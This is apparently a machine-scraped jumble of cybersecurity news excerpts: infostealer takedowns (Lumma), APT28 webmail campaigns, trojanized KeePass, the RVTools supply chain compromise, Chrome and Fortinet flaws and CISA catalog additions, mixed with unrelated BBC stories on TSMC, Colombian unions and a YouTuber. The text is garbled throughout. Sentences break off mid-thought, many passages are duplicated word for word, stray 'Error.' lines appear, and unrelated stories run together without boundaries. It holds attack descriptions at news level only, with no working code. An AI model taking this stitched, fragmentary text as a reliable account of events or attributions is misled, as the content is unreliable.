These IOCs can then be used to: Block malicious domains across your infrastructure Update email filters and detection rules Enrich your threat intelligence database Support incident response and SOC workflows IOCs gathered inside ANY.RUN sandbox Finally, ANY.RUN generates a well-structured, shareable report that includes all key details, from behavior logs and network traffic to screenshots and IOCs.Upload the file or paste a URL, pick your OS (Windows, Linux, or Android), tweak your settings if needed, and within seconds, you"re inside a fully interactive virtual machine ready to investigate. Analysis setup inside ANY.RUN sandbox To show how easy it is to detect phishing, let"s walk through a real-world example, a potential phishing email we analyzed using ANY.RUN, is one of the fastest and most intuitive sandboxes available. Step 3: Analyze and Collect IOCs Once the phishing chain is fully detonated, the next step is what matters most to security teams; gathering indicators of compromise (IOCs) that can be used for detection, response, and future prevention. "Autosummary:
Name, address, phone, and email; Masked Social Security (last 4 digits only); Masked bank-account numbers and some bank account identifiers; Government‑ID images (e.g., driver’s license, passport); Account data (balance snapshots and transaction history); and Limited corporate data (including documents, training material, and communications available to support agents). "Autosummary:
U.S. CISA adds Ivanti EPMM, MDaemon Email Server, Srimax Output Messenger, Zimbra Collaboration, and ZKTeco BioTime flaws to its Known Exploited Vulnerabilities catalog Pierluigi Paganini May 21, 2025 May 21, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti EPMM, MDaemon Email Server, Srimax Output Messenger, Zimbra Collaboration, and ZKTeco BioTime flaws to its Known Exploited Vulnerabilities catalog. "Autosummary:
"Autosummary:
Next, the attacker downloaded and extracted a malicious archive from a spoofed domain, containing a VBS script, a QEMU emulator, and a Windows 7 image pre-loaded with QDoor backdoor. "Autosummary:
After compromising a system, Lumma can steal data from web browsers and applications, including cryptocurrency wallets and cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium browsers. "Autosummary:
ThreatLocker Ringfencing™ controls what approved applications can access—like files, scripts, or the internet—stopping living-off-the-land attacks and preventing lateral movement before it starts Learn More ThreatLocker Patch Management: Designed for Zero Trust Environments ThreatLocker flips the typical patching script by assuming that every change — even a vendor patch — must be treated as untrusted until verified. Closing the Vulnerability Gap: Visibility, Control, Speed ThreatLocker Patch Management isn’t just about automating updates — it’s about giving security teams the tools they need to: Understand the security and operational impact of patches before hitting deploy. ThreatLocker Patch Management is built to tackle this reality head-on, providing security teams with greater control, visibility, and confidence over patching workflows — without compromising the stability of production systems. In fact, according to the 2023 Top Routinely Exploited Vulnerabilities (CISA), many breaches traced back to vulnerabilities that had patches available for months, or even years — a clear sign that it"s not awareness that"s lacking, but execution. "A coordinated action by US, European and Japanese authorities and tech companies like Microsoft and Cloudflare has disrupted the infrastructure behind Lumma Stealer, the most significant infostealer threat at the moment. What is Lumma Stealer? Lumma Stealer is Malware-as-a-Service offering beloved by a wide variety of threat actors. The malware is able to steal credentials, financial data, and personal information, which is then sold through a dedicated marketplace. It’s also able to deliver additional malicious … More
The post Lumma Stealer Malware-as-a-Service operation disrupted appeared first on Help Net Security.
"Autosummary:
The organizations involved in the joint action include the US DoJ, Europol, Japan’s Cybercrime Control Center (which helped suspend Lumma infrastructure in Japan), Microsoft’s Digital Crimes Unit, Cloudflare, Lumen Technologies, Bitsight, ESET, CleanDNS, GMO Registry, and Orrick. "Autosummary:
According to the report, the hackers gained initial access using multiple techniques, among them: Credential guessing or brute force Spear-phishing for credentials Spear-phishing to deliver malware Exploiting the Outlook NTLM vulnerability CVE-2023-23397 Leveraging vulnerabilities (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026) in the Roundcube open-source webmail software Exploiting internet-facing infrastructure, corporate VPNs included, via public vulnerabilities and SQL injection Exploiting WinRAR vulnerability CVE-2023-38831 To hide the origin of the attack, APT28 routed their communication through compromised small office/home office devices that were in proximity to the target. "Autosummary:
Targets of the campaign include companies involved in the coordination, transport, and delivery of foreign assistance to Ukraine, according to a joint advisory released by agencies from Australia, Canada, Czechia, Denmark, Estonia, France, Germany, the Netherlands, Poland, the United Kingdom, and the United States. "Autosummary:
A cyberattack was responsible for the week-long outage affecting Cellcom wireless network Pierluigi Paganini May 21, 2025 May 21, 2025 Cellcom, a regional wireless carrier based in Wisconsin (US), announced that a cyberattack is the cause of a service outage it faced during the past week. "Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Guest: Dinah Davis Episode links: Sponsored by: Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money. "CISO Vault Cloud | Australia | Hybrid – View job details As a CISO, you will lead company’s cloud security strategy, scale the SOC team, and manage cyber threats to protect national data. You’ll work with stakeholders to enhance security, develop advanced tools, maintain up-to-date policies, and align company’s direction with government and industry partners. Chief Information Officer Aspira | USA | On-site – View job details As a Chief Information Officer, you will create, … More
The post Cybersecurity jobs available right now: May 20, 2025 appeared first on Help Net Security.
"Autosummary:
Senior Cloud Security Engineer, DevSecOps Figment | Canada | Remote – View job details As a Senior Cloud Security Engineer, DevSecOps, you will design, implement, and manage security controls for cloud infrastructure in AWS and GCP. Chief Information Officer Aspira | USA | On-site – View job details As a Chief Information Officer, you will create, implement, and maintain comprehensive policies, procedures, and frameworks that adhere to industry best practices. Information Security Operations Manager Chalhoub Group | UAE | On-site – View job details As an Information Security Operations Manager, you will oversee global SOC activities, ensuring 24/7 monitoring, detection, and response to security threats. Red Team Operator Bayer | Israel | Hybrid – View job details As a Red Team Operator, you will lead full-scope engagements—initial access, C2, evasion, lateral movement, and objective execution. Insider Threat Program Lead Marvell Technology | USA | Remote – No longer accepting applications As an Insider Threat Program Lead, you will design, implement, and manage Marvell’s Insider Threat Program, ensuring alignment with organizational goals, industry best practices and regulatory requirements. DevSecOps Engineer Leonar | France | On-site – View job details As a DevSecOps Engineer, you will drive security best practices, maintain compliance with SOC 2 and ISO 27001, propose new security measures, and support audit processes. "Microsoft has officially open-sourced the Windows Subsystem for Linux (WSL), closing the very first issue ever filed on the Microsoft/WSL GitHub repository: “Will this be open source?” WSL allows developers to run unmodified Linux command-line tools, utilities, and applications directly on Windows, without the overhead of a traditional virtual machine or dual-boot setup.
The post The Windows Subsystem for Linux goes open source appeared first on Help Net Security.
"Autosummary:
"Absolute Security announced new Extreme Resilience capabilities available in Rehydrate, an Absolute Resilience Platform module. Rehydrate enables remote restoration of Windows endpoints at enterprise scale with a single click. It delivers full recovery even when the device OS and other security or management tools have crashed, been compromised, or become corrupted. With these new Extreme Resilience capabilities, Rehydrate is now the only business continuity restoration solution that offers playbook-driven response capabilities that empower Security and … More
The post Absolute Extreme Resilience accelerates recovery following cyberattacks and IT incidents appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"While regular users received the bulk of authentication attempts (50,214), admin accounts and shared mailboxes were targeted at a specific pattern, with admin accounts receiving 9,847 attempts across 432 IPs over 8 hours, suggesting an average of 22.79 attempts per IP and a velocity of 1,230.87 attempts per hour," the company said. "Autosummary:
It achieves this by targeting different API endpoints - i.instagram[.]com/api/v1/users/lookup/ i.instagram[.]com/api/v1/bloks/apps/com.bloks.www.caa.ar.search.async/ i.instagram[.]com/api/v1/accounts/send_recovery_flow_email/ www.instagram[.]com/api/v1/web/accounts/check_email/ "Sinnercore," on the other hand, aims to trigger the forgot password flow for a given username, targeting the API endpoint "b.i.instagram[.]com/api/v1/accounts/send_password_reset/" with fake HTTP requests containing the target"s username. "Autosummary:
Downloaded data may have included contact details and addresses of applicants, their dates of birth, national ID numbers, criminal history, employment status and financial data such as contribution amounts, debts and payments. "Autosummary:
"Red Hat Enterprise Linux 10 provides a strategic and intelligent backbone for enterprise IT to navigate complexity, accelerate innovation and build a more secure computing foundation for the future. As enterprise IT grapples with the proliferation of hybrid environments and the imperative to integrate AI workloads, the need for an intelligent, resilient and durable operating system has never been greater. Red Hat Enterprise Linux 10 rises to this challenge, delivering a platform engineered for agility, … More
The post Red Hat Enterprise Linux 10 helps mitigate future quantum-based threats appeared first on Help Net Security.
"Autosummary:
With intelligent features using gen AI, unified hybrid cloud management through image mode and a proactive approach to security with post-quantum cryptography, Red Hat Enterprise Linux 10 provides the robust and innovative foundation needed to thrive in the era of hybrid cloud and AI,” said Gunnar Hellekson, VP and GM, Red Hat Enterprise Linux, Red Hat. Key additions in Red Hat Enterprise Linux 10 include capabilities and innovations to: Get ready for the hybrid cloud, today with pre-tuned, fully supported and ready-to-run Red Hat Enterprise Linux images across AWS, Google Cloud and Microsoft Azure. "A suspected initial access broker has been leveraging trojanized versions of the open-source KeePass password manager to set the stage for ransomware attacks, WithSecure researchers have discovered. KeeLoader: Passoword manager that acts as data stealer and malware loader In February 2025, WithSecure’s inicident responders were hired by an European IT service provider to help with response and remediation after a ransomware gang encrypted their VMware ESXi servers’ datastores. While the attack itself was relatively typical, … More
The post Trojanized KeePass opens doors for ransomware attackers appeared first on Help Net Security.
"Autosummary:
During this engagement, WithSecure’s Threat intelligence analysts have also uncovered a slew of malvertising campaigns, typosquatted domains, and subdomains that served KeeLoader, the Nitrogen loader posing as legitimate software (WinSCP, TreeSize Free), and phishing pages impersonating financial institutions and services, as well as evidence of active, 8-month-long development of KeeLoader. "Autosummary:
"Autosummary:
Some of the identified services with the permissive policy are listed below - Amazon SageMaker AI, which creates a default execution role named AmazonSageMaker-ExecutionRole-<Date&Time> when setting up a SageMaker Domain that comes with a custom policy equivalent to AmazonS3FullAccess AWS Glue, which creates a default AWSGlueServiceRole role with the AmazonS3FullAccess policy Amazon EMR, which creates a default AmazonEMRStudio_RuntimeRole_<Epoch-time> role that"s assigned the AmazonS3FullAccess policy In a hypothetical attack scenario, a threat actor could upload a malicious machine learning model to Hugging Face that, when imported into SageMaker, can result in the execution of arbitrary code, which could then be used to seize control of other AWS services like Glue by injecting a backdoor capable of stealing IAM credentials of the Glue job. "Autosummary:
No Guarantees Over the past year, 45% of enterprises expanded their security technology stacks, with organizations now managing an average of 75 different security solutions. Yet despite these layers of security tools, 67% of U.S. enterprises experienced a breach in the past 24 months. The growing number of deployed tools has a few effects on the daily operation and the overall cyber posture of the organization. "Autosummary:
"Autosummary:
This breach allowed attackers to steal data that included IMSI, USIM authentication keys, network usage data, and SMS/contacts stored in the SIM. "Autosummary:
"Autosummary:
While the Conti ransomware operation shut down in 2022, many of its members split off into other ransomware operations, including Black Basta, Royal, Silent Ransom, and others, who likely still have access to the tooling.When it came back online, the download had changed: the file size was smaller, and the hash now matched the clean version listed on the site" Bumblebee is a malware loader that is typically promoted via SEO poisoning, malvertising, and phishing attacks. "Autosummary:
Error. "Autosummary:
" In doing so, the idea is to flood a victim"s device with push notifications and deliver an endless torrent of malicious content, with each notification leading to different scams, scareware, and fake surveys, and accompanied by requests to allow more push notifications. "Autosummary:
" Cellcom initially claimed the disruption was caused by a technical issue, stating that data services, iMessage, RCS messaging, and 911 emergency services remained operational. "Autosummary:
common.h header file used by the builder Source: BleepingComputer However, the leak also includes the source code for the affiliate panel, which hosts the api.php endpoint, so threat actors could modify the code or run their own version of this panel to get the builder to work. "Autosummary:
When it came back online, the download had changed: the file size was smaller, and the hash now matched the clean version listed on the site" Bumblebee is a malware loader that is typically promoted via SEO poisoning, malvertising, and phishing attacks.While the Conti ransomware operation shut down in 2022, many of its members split off into other ransomware operations, including Black Basta, Royal, Silent Ransom, and others, who likely still have access to the tooling." Notice on robware.net and rvtools.com Source: BleepingComputer.com RVTool supply chain attack RVTools, initially developed by Robware and now owned by Dell, is a Windows utility that provides comprehensive inventory and health reporting for VMware vSphere environments. "The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.
The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Autosummary: Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [TA0010, T1119].Summary The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. Download the PDF version of this report: For a downloadable copy of IOCs, see: Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. "
Autosummary:
But the former head of the National Cyber Safety Centre (NCSC), Ciaran Martin, said his "biggest cyber-security worry" was the threat of simultaneous attacks on public services, like councils and hospitals, which had the potential to "wreck lives".The exact figure has never been made public, but Mr Martin said that, based on similar attacks, it was likely to have been in the "low single figure millions of US dollars".A year later, in February 2023, a group of Russian hackers were sanctioned by UK and US government over a string of attacks on businesses, schools and councils, including Redcar and Cleveland. Mary Lanigan said the impact of the cyber-attack had been "devastating" In the days before Saturday 8 February 2020, an email with a seemingly innocuous attachment arrived in a council inbox. "AI systems can sometimes produce outputs that are incorrect or misleading, a phenomenon known as hallucinations. These errors can range from minor inaccuracies to misrepresentations that can misguide decision-making processes. Real world implications “If a company’s AI agent leverages outdated or inaccurate data, AI hallucinations might fabricate non-existent vulnerabilities or misinterpret threat intelligence, leading to unnecessary alerts or overlooked risks. Such errors can divert resources from genuine threats, creating new vulnerabilities and wasting already-constrained SecOps … More
The post AI hallucinations and their risk to cybersecurity operations appeared first on Help Net Security.
"Autosummary:
As to senior developers, they will likely spot an error in a timely manner, however, the increasing number of them over-rely on GenAI, blindly trusting its output,” said Ilia Kolochenko, CEO of ImmuniWeb. By embedding trust, traceability, and control into AI deployment, CISOs can balance innovation with accountability, keeping hallucinations in check without slowing progress: 1.“All AI-generated responses must carry metadata including source context, model version, prompt structure, and timestamp,” Conikee notes. "Autosummary:
Pwn2Own Berlin 2025: total prize money reached $1,078,750 Pierluigi Paganini May 19, 2025 May 19, 2025 Pwn2Own Berlin 2025 wrapped up with $383,750 awarded on the final day, pushing the total prize money to $1,078,750 over three days. "Autosummary:
"Autosummary:
"Autosummary:
"ThreatMark launched ScamFlag, a Generative AI-powered solution designed to protect digital banks and their customers from the scams and social engineering attacks. Seamlessly integrating into existing digital banking applications, ScamFlag enables financial institutions to provide their customers with scam detection capabilities without requiring separate app downloads or complex setup. The announcement comes as global fraud losses reached a staggering $486 billion in 2023, with more than 70% attributed to scams that trick legitimate users into … More
The post ThreatMark offers protection against social engineering attacks and scams appeared first on Help Net Security.
"Autosummary:
"A phishing operation that targets corporate banking accounts across the globe has been analyzed in a new report by CTM360. The campaign uses fake Google ads, advanced filtering techniques, to steal sensitive login credentials and bypass MFA. Researchers uncovered more than 12,000 malicious redirector URLs spread across 35 unique potential phishing redirector templates. The infrastructure supports two distinct phishing techniques, both of which are difficult to detect and designed to evade automated scanning tools. What … More
The post CTM360 maps out real-time phishing infrastructure targeting corporate banking worldwide appeared first on Help Net Security.
"Autosummary:
Commands like “OTP,” “QUESTION,” or “2ND_USER” prompt the user to hand over additional details, scan QR codes, or involve other employees, increasing the potential damage. A persistent threat This campaign reflects an evolution in phishing tactics, where attackers use automation, live control, and targeted filtering to improve their success rate and avoid detection. Researchers observed thousands of redirector domains, hundreds of unique phishing URLs, and targeting activity across North America, the Middle East, and Europe. "Autosummary:
"Autosummary:
This week"s list includes — CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, CVE-2025-32709 (Microsoft Windows), CVE-2025-42999 (SAP NetWeaver), CVE-2024-11182 (MDaemon), CVE-2025-4664 (Google Chrome), CVE-2025-4632 (Samsung MagicINFO 9 Server), CVE-2025-32756 (Fortinet FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera), CVE-2025-4427, CVE-2025-4428 (Ivanti Endpoint Manager Mobile), CVE-2025-3462, CVE-2025-3463 (ASUS DriverHub), CVE-2025-47729 (TeleMessage TM SGNL), CVE-2025-31644 (F5 BIG-IP), CVE-2025-22249 (VMware Aria Automation), CVE-2025-27696 (Apache Superset), CVE-2025-4317 (TheGem WordPress theme), CVE-2025-23166 (Node.js), CVE-2025-47884 (Jenkins OpenID Connect Provider Plugin), CVE-2025-47889 (Jenkins WSO2 Oauth Plugin), CVE-2025-4802 (Linux glibc), and CVE-2025-47539 (Eventin plugin).While the set of attacks was believed to be confined to drone manufacturers in Taiwan, a subsequent analysis has uncovered that the campaign is more broader and sustained in scope than previously thought, hitting the heavy industry, media, technology, software services, healthcare, satellite, and military-adjacent supply chains, and payment service providers in both South Korea and Taiwan.While no passwords, private keys, or funds were exposed, the attackers made away with some amount of personal information, including names, addresses, phone numbers, email addresses, government ID images, and account balances.While no passwords, private keys, or funds were exposed, the attackers made away with some amount of personal information, including names, addresses, phone numbers, email addresses, government ID images, and account balances."Following his arrest in September 2024 and continuing while in pretrial detention, Lam is alleged to have continued working with members of the enterprise to pass and receive directions, collect stolen cryptocurrency, and have enterprise members buy luxury Hermes Birkin bags and hand-deliver them to his girlfriend in Miami, Florida," the agency said."Following his arrest in September 2024 and continuing while in pretrial detention, Lam is alleged to have continued working with members of the enterprise to pass and receive directions, collect stolen cryptocurrency, and have enterprise members buy luxury Hermes Birkin bags and hand-deliver them to his girlfriend in Miami, Florida," the agency said.APT28 Behind Attacks Targeting Webmail Services — APT28, a hacking group linked to Russia"s Main Intelligence Directorate (GRU), has been targeting webmail servers such as Roundcube, Horde, MDaemon, and Zimbra via cross-site scripting (XSS) vulnerabilities. — APT28, a hacking group linked to Russia"s Main Intelligence Directorate (GRU), has been targeting webmail servers such as Roundcube, Horde, MDaemon, and Zimbra via cross-site scripting (XSS) vulnerabilities.The vulnerabilities include CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, and CVE-2025-32709.The various roles included database hackers, organizers, target identifiers, callers, money launderers, and residential burglars targeting hardware virtual currency wallets."The various roles included database hackers, organizers, target identifiers, callers, money launderers, and residential burglars targeting hardware virtual currency wallets."Built entirely on AWS services like Lambda, S3, and DynamoDB, TrailAlerts lets you detect suspicious activity, correlate events, and send alerts through SNS or SES—without managing infrastructure or paying for unused capacity.The victims in 2024 alone included officials from regional national governments in Ukraine, Greece, Cameroon and Serbia, military officials in Ukraine and Ecuador, and employees of defense contracting firms in Ukraine, Romania and Bulgaria.The victims in 2024 alone included officials from regional national governments in Ukraine, Greece, Cameroon and Serbia, military officials in Ukraine and Ecuador, and employees of defense contracting firms in Ukraine, Romania and Bulgaria.The attacks, ongoing since at least 2023, targeted governmental entities and defense companies in Eastern Europe, although governments in Africa, Europe, and South America were also singled out.The attacks, ongoing since at least 2023, targeted governmental entities and defense companies in Eastern Europe, although governments in Africa, Europe, and South America were also singled out. "Autosummary:
Reuters The body of América Sánchez will be taken to her home town of Xalapa on Monday "She was a warrior, a soldier who didn"t give up, who always fought for her goals," she said, adding that her daughter only had one year left until her graduation. "Autosummary:
The firm has an annual revenue of €13.8 billion ($15.5 billion), and its products, including the brands Arla, Lurpak, Puck, Castello, and Starbucks, are sold in 140 countries worldwide. "Autosummary:
"Autosummary:
"Autosummary:
When you visit a website, your browser often needs to load additional pieces of that site, such as images, scripts, or stylesheets, which may come from various sources. "Autosummary:
XRed, believed to be active since at least 2019, comes with features to collect system information, log keystrokes, propagate via connected USB drives, and execute commands sent from an attacker-controlled server to capture screenshots, enumerate file systems and directories, download files, and delete files from the system. "Autosummary:
Some of the supported PowerShell commands are listed below - Startup, which ensures persistence by creating shortcuts in the Startup directory of the victim"s device Screen, which captures a screenshot of the victim"s desktop Anydesk/Rutserv, which deploys a legitimate remote desktop software like AnyDesk or Remote Utilities ("rutserv.exe") Shell, to run PowerShell scripts hosted on a remote server and send the results back to the C2 server AV, which gathers a list of installed security products "Skitnet is a multi-stage malware that leverages multiple programming languages, and encryption techniques," PRODAFT said. "Autosummary:
The aenys[.]com domain was used to host additional subdomains that impersonated well-known companies and services, such as WinSCP, PumpFun, Phantom Wallet, Sallie Mae, Woodforest Bank, and DEX Screener. "Autosummary:
However, as Williams discovered while analyzing the traffic during such a call, the signalling messages (SIP Headers) exchanged between the communicating parties are far too verbose and revealing, including IMSI, IMEI, and cell location data. "Autosummary:
Mozilla fixed zero-days recently demonstrated at Pwn2Own Berlin 2025 Pierluigi Paganini May 19, 2025 May 19, 2025 Mozilla addressed two critical Firefox vulnerabilities that could be potentially exploited to access sensitive data or achieve code execution. "Autosummary:
He added that the prime minister "must not sell" the next generation of singers, songwriters, musicians, and music creators "down the river and allow all that talent to be crushed by letting soulless AI bots plunder their work". "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Patch Tuesday: Microsoft fixes 5 actively exploited zero-days On May 2025 Patch Tuesday, Microsoft has released security fixes for 70+ vulnerabilities, among them five actively exploited zero-days and two publicly disclosed (but not exploited) vulnerabilities. How to give better cybersecurity presentations (without sounding like a robot) Most people think great presenters are born with natural talent. Luka Krejci, a presentation … More
The post Week in review: Microsoft patches 5 actively exploited 0-days, recently fixed Chrome vulnerability exploited appeared first on Help Net Security.
"Autosummary:
How Kim Crawley challenges big tech in “Digital Safety in a Dangerous World” In this Help Net Security interview, Kim Crawley, cybersecurity expert and Professor at the Open Institute of Technology, discusses her upcoming book Digital Safety in a Dangerous World, which will feature her expert advice, as well as insights from other cybersecurity experts, lawyers, and activists, on how to lawfully protect your safety and privacy in challenging times. Building cybersecurity culture in science-driven organizations In this Help Net Security interview, Anne Sofie Roed Rasmussen, CISO at Novonesis, discusses how a science-driven organization approaches cybersecurity, aligning innovation with protection, measuring cultural progress, managing shadow IT, and earning trust from scientific leaders. New infosec products of the week: May 16, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Hunted Labs, McAfee, Obsidian Security, PentestPad, Resecurity, and SecuX. "Autosummary:
"Autosummary:
"For many years now already, unfortunately, Colombia is the deadliest country in the world for trade unionists and for trade union work," says Luc Triangle, general secretary of the International Trade Union Confederation (ITUC), a global umbrella organization based in Brussels."If you look at where these attacks are happening, it"s in the departments of Cauca, Nariño, Putumayo, Arauca, Norte de Santander and Caquetá, because that"s where the biggest coca plantations are, and where the illegal mining is.Fabio Arias, the head of Colombia"s largest trade union federation, the CUT, says it is all part of Colombia"s long and complex civil conflict, which pitted left-wing rebel groups against right-wing paramilitaries, drug traffickers and the Colombian state, and which still rumbles on in some parts of the country. "Autosummary:
The supply chain for semiconductors is global as no single country can do everything at the moment, says Rose Castanares, President of TSMC Arizona On the walkway into the building are photographs showing Biden"s visit in 2022, with the building site draped in the Stars and Stripes and a banner saying "a future Made in America".It is, in my view, the most important factory in the world, and it"s being built by a company you may have not have heard of: TSMC, Taiwan Semiconductor Manufacturing Company.So for now, it"s a battle for global tech and economic supremacy, in which Taiwan"s factory technology, some of which is now being moved to the Arizona desert, is the critical asset.The secretive US factory that lays bare the contradiction in Trump"s America First plan 4 hours ago Share Save Faisal Islam • @faisalislam Economics editor Reporting from Arizona Share Save BBC Among the cactuses in the desert of Arizona, just outside Phoenix, an extraordinary collection of buildings is emerging that will shape the future of the global economy and the world.The expansion of the Arizona facility, which was announced in March is, he believes, the poster child for his economic policies - in particular the encouragement of foreign companies to relocate factories to the US to avoid hefty tariffs. "Autosummary:
Nomura, a Japanese broking house, also pointed to growing "anecdotal evidence" of India emerging as a winner from "trade diversion and supply-chain shift in low and mid-tech manufacturing" particularly in sectors like electronics, textiles and toys. "Autosummary:
"Autosummary:
The FBI warns of a campaign using smishing and vishing with deepfake texts and AI voice messages impersonating senior U.S. officials to current or former senior US federal or state government officials and their contacts Since April 2025, threat actors have been using texts and AI voice messages impersonating senior U.S. officials to build trust and access personal accounts. "In this Help Net Security interview, Camellia Chan, CEO at X-PHY, discusses the dangers of deepfakes in real-world incidents, including their use in financial fraud and political disinformation. She explains AI-driven defense strategies and recommends updating incident response plans and internal policies, integrating detection tools, and ensuring compliance with regulations like the EU’s DORA to mitigate liability. How have attackers used deepfakes in real-world incidents, even if hypothetically, and how plausible are those tactics becoming? … More
The post Deepfake attacks could cost you more than money appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Camellia Chan, CEO at X-PHY, discusses the dangers of deepfakes in real-world incidents, including their use in financial fraud and political disinformation.Advanced machine learning models, especially multi-modal AI, are becoming increasingly effective at spotting subtle, sophisticated signs of manipulation – from unnatural blinking and facial inconsistencies to mismatched audio-visual cues. This is just one example, but recently I’ve seen an increasing number of reports where companies were tricked into transferring large sums of money based on deepfaked video calls – some of our partners, customers, and even my internal staff have highlighted this as a concern. "AI is transforming the phishing threat landscape at a pace many security teams are struggling to match, according to Cofense. In 2024, researchers tracked one malicious email every 42 seconds. Many of the 42-second attacks were part of polymorphic phishing attacks. Unlike traditional phishing methods, polymorphic phishing attacks rely on dynamic changes to the appearance and structure of malicious emails or links. Attackers use sophisticated algorithms to alter subject lines, sender addresses, and email content … More
The post Polymorphic phishing attacks flood inboxes appeared first on Help Net Security.
"Autosummary:
Industries with the largest increase in reported malicious emails: Education : 341% : 341% Construction : 1,282% : 1,282% Taxes-related campaigns : 340% : 340% Campaigns utilizing legitimate files: 575% Microsoft has been identified as the most frequently spoofed brand in 2024. "The Linux Foundation, in collaboration with OpenSSF and Linux Foundation Education, has released the Cybersecurity Skills Framework, a global reference guide that helps organizations identify and address critical cybersecurity competencies across a broad range of IT job families. “Cybersecurity is now a leadership issue, not just a technical one,” said Steve Fernandez, General Manager at OpenSSF. “Our framework gives organizations a straightforward way to identify gaps and prioritize the security skills that matter most, based … More
The post Cybersecurity Skills Framework connects the dots between IT job roles and the practical skills needed appeared first on Help Net Security.
"Autosummary:
"Stressful work environments don’t just erode morale, they can quietly undermine cybersecurity. When employees feel overworked, unsupported, or mistreated, their judgment and decision-making suffer. “From an organizational perspective, a toxic culture often leads to increased errors, missed threats, decreased productivity, and higher turnover rates,” said Rob Lee, Chief of Research and Head of Faculty at SANS Institute. According to CyberArk, 65% of office workers admit they’ve bypassed cybersecurity policies to stay productive. Frustration and anger … More
The post How working in a stressful environment affects cybersecurity appeared first on Help Net Security.
"Autosummary:
“From an organizational perspective, a toxic culture often leads to increased errors, missed threats, decreased productivity, and higher turnover rates,” said Rob Lee, Chief of Research and Head of Faculty at SANS Institute. "Autosummary:
"Autosummary:
This is the second actively exploited Chrome zero-day patched by Google this year, after another high-severity Chrome zero-day bug (CVE-2025-2783), which was abused to target Russian government organizations, media outlets, and educational institutions in cyber-espionage attacks. "Autosummary:
In March 2025, Google released out-of-band fixes to address another high-severity security vulnerability, tracked as CVE-2025-2783, in Chrome browser for Windows. "A high-severity Chrome vulnerability (CVE-2025-4664) that Google has fixed on Wednesday is being leveraged by attackers, CISA has confirmed by adding the flaw to its Known Exploited Vulnerabilities catalog. About CVE-2025-4664 CVE-2025-4664 stems from insufficient policy enforcement in Google Chrome’s Loader, which attackers can use to make the browser leak cross-origin data that can be used to take over accounts. The vulnerability can be triggered with a maliciously crafted HTML page, on Chrome versions prior … More
The post CISA: Recently fixed Chrome vulnerability exploited in the wild (CVE-2025-4664) appeared first on Help Net Security.
"Autosummary:
“Google is aware that knowledge of CVE-2025-4664 exists in the wild,” the company said when it pushed out the update, and referred to an X (formerly Twitter) post by security researcher Vsevolod Kokorin, aka “slonser_”, as the source. "Autosummary:
"Autosummary:
G Data researcher Karsten Hahn offered to investigate, finding that at least six printer models (F8, F13, F13 Pro, V6, V11 Pro, and VF13 Pro) with accompanying software hosted on the Mega file sharing platform that included contained malware. Discovering RATs and coin stealers After getting the threat alerts on his machine, Coward contacted Procolored, who denied shipping malware in their software, pointing to the security solution generating false positives. "Autosummary:
Skitnet"s admin panel Source: Prodaft The supported commands are: startup - Establishes persistence by downloading three files (including a malicious DLL) and creating a shortcut to a legitimate Asus executable (ISP.exe) in the Startup folder. Skitnet"s .NET loader Source: Prodaft Though ransomware groups often use custom tools tailored to specific operations and have low AV detection, these are costly to develop and require skilled developers who aren"t always available, especially in lower-tier groups. "Autosummary:
The video "I Explored 2000 Year Old Ancient Temples" shows the influencer, real name Jimmy Donaldson, 27, and his team exploring ancient Mayan cities, with a permit. "In this Help Net Security interview, Anne Sofie Roed Rasmussen, CISO at Novonesis, discusses how a science-driven organization approaches cybersecurity, aligning innovation with protection, measuring cultural progress, managing shadow IT, and earning trust from scientific leaders. How do you measure progress when it comes to building a cybersecurity culture in a science-driven organization? Science, exploration, and innovation are at the heart of our organizational DNA. However, no one is immune to making mistakes—anyone, regardless of … More
The post Building cybersecurity culture in science-driven organizations appeared first on Help Net Security.
"Autosummary:
Error. "Autosummary:
In March, Google also fixed a high-severity Chrome zero-day bug (CVE-2025-2783) that was abused to deploy malware in espionage attacks targeting Russian government organizations, media outlets, and educational institutions. "Autosummary:
"Autosummary:
“To verify if fcgi debugging is enabled on your system, use the following CLI command: diag debug application fcgi If the output shows “general to-file ENABLED”, it means fcgi debugging is enabled on your system: fcgi debug level is 0x80041 general to-file ENABLED This is not a default setting, so unless you have enabled it in the past, this is potentially an Indicator of Compromise” continues the advisory. "Autosummary:
